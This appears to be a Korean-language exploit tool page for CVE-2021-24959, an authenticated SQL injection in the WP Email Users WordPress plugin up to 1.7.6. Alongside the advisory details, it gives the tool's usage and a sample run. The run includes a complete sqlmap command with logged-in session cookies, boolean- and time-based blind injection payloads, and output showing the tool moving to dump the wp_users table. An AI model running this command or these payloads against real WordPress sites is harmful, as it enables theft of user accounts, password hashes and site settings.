
WP Email Users <= 1.7.6 - SQL Injection
WP Email Users WordPress 플러그인 버전 1.7.6까지는 weu_selected_users_1 AJAX 액션에서 data_raw 매개변수를 이스케이프 처리하지 않아, 인증된 사용자가 SQL 인젝션 공격을 수행할 수 있습니다.
CVE CVE-2021-24959
CVSS 8.8 (높음)
공개일 2022년 1월 31일
최종 업데이트 2024년 1월 22일
연구자 Krzysztof Zając - CERT PL
이 도구는 wp_users와 wp_options를 덤프합니다.
usage: CVE-2021-24959.py [-h] -u URL [-un USERNAME] [-p PASSWORD]
WP Email Users <= 1.7.6 - SQL Injection 설명: CVE-2021-24959 WP Email Users WordPress 플러그인 버전 1.7.6까지는 weu_selected_users_1 AJAX 액션에서 data_raw 매개변수를 이스케이프 처리하지 않아, 인증된 사용자가 SQL 인젝션 공격을 수행할 수 있습니다.
옵션:
-h, --help 도움말 메시지 표시 후 종료
-u URL, --url URL 웹사이트 URL
-un USERNAME, --username USERNAME
WordPress 사용자명
-p PASSWORD, --password PASSWORD
WordPress 비밀번호
python3 CVE-2021-24959.py -u http://kubernetes.docker.internal -un user -p user
플러그인 버전이 1.7.7 미만입니다.
플러그인 버전이 1.7.6입니다.
취약점 확인: http://kubernetes.docker.internal
로그인 성공.
명령줄: sqlmap.py -u "http://kubernetes.docker.internal/wp-admin/admin-ajax.php" --data="data_raw%5B%5D=&action=weu_selected_users_1" --time-sec=10 --threads 4 --batch -p data_raw[] -T wp_users,wp_options --dump --referer="http://kubernetes.docker.internal/wp-admin/" --level 3 --risk 3 --technique=BT --dbms=mysql --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" --cookie "_lscache_vary=36193a4836ccd8886b480d97874c6e09; wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1727270083%7CypC9NnM7X9UHKJQQn6iQAMjiJuiEifptBohNqPTbX5s%7Cd4a37484820e7215c7d4f6e255c1f5204b49557392dc6368d7270784a63bdd9f; wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1727097284; wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1727270083%7CypC9NnM7X9UHKJQQn6iQAMjiJuiEifptBohNqPTbX5s%7C296a7aa7ab54b062d71a4f60399e41643aba06b9b13ccbc4cdb13bf0b262a7a9; wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1727270083%7CypC9NnM7X9UHKJQQn6iQAMjiJuiEifptBohNqPTbX5s%7C296a7aa7ab54b062d71a4f60399e41643aba06b9b13ccbc4cdb13bf0b262a7a9"
___
__H__
___ ___[(]_____ ___ ___ {1.8.7#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] 법적 고지: 사전 상호 동의 없이 타겟을 공격하기 위해 sqlmap을 사용하는 것은 불법입니다. 모든 해당 지역, 주 및 연방 법률을 준수하는 것은 최종 사용자의 책임입니다. 개발자는 어떠한 책임도 지지 않으며 이 프로그램으로 인한 오용이나 손해에 대해 책임을 지지 않습니다.
[*] 시작 시간: 14:14:44 /2024-09-23/
[14:14:44] [경고] 'data_raw[]' 매개변수에 제공된 값이 비어 있습니다. sqlmap이 제대로 실행될 수 있도록 유효한 매개변수 값만 사용하십시오.
[14:14:44] [정보] 대상 URL 연결 테스트 중
sqlmap이 저장된 세션에서 다음 인젝션 포인트를 재개했습니다:
---
매개변수: data_raw[] (POST)
유형: boolean-based blind
제목: OR boolean-based blind - WHERE 또는 HAVING 절
페이로드: data_raw[]=-1975 OR 3344=3344&action=weu_selected_users_1
유형: time-based blind
제목: MySQL >= 5.0.12 time-based blind - 매개변수 대체
페이로드: data_raw[]=(CASE WHEN (8496=8496) THEN SLEEP(10) ELSE 8496 END)&action=weu_selected_users_1
---
[14:14:44] [정보] MySQL 테스트 중
[14:14:44] [정보] MySQL 확인 중
[14:14:44] [정보] 백엔드 DBMS는 MySQL입니다
웹 서버 운영 체제: Linux Debian 9 (stretch)
웹 애플리케이션 기술: Apache 2.4.25, PHP 7.3.5
백엔드 DBMS: MySQL >= 5.0.0
[14:14:44] [경고] 데이터베이스 매개변수가 누락되었습니다. sqlmap이 현재 데이터베이스를 사용하여 테이블 항목을 열거합니다.
[14:14:44] [정보] 현재 데이터베이스 가져오는 중
[14:14:44] [정보] 쿼리 출력 길이 검색 중
[14:14:44] [정보] 재개됨: 9
[14:14:44] [정보] 재개됨: wordpress
[14:14:44] [정보] 데이터베이스 'wordpress'의 테이블 'wp_users'에 대한 열 가져오는 중